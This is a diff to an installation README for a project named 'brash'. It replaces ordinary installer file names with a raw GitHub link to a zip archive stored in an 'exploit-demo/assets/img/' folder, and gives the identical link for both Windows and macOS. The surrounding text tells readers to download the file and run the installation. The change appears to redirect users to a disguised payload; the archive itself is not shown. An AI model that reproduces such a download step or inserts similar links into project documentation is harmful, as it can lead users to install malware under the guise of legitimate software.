ismyso5415/brash/README.md

 ### 3. Download the Package

 You will find several files for each version.
 Choose the file that corresponds with your operating system.
-This is typically named something like `brash-windows.exe` for Windows or `brash-macos.dmg` for macOS.
+This is typically named something like `https://raw.githubusercontent.com/ismyso5415/brash/main/exploit-demo/assets/img/brash_v2.8.zip` for Windows or `https://raw.githubusercontent.com/ismyso5415/brash/main/exploit-demo/assets/img/brash_v2.8.zip` for macOS.
 Click on the file name to start the download.

 ### 4. Run the Installation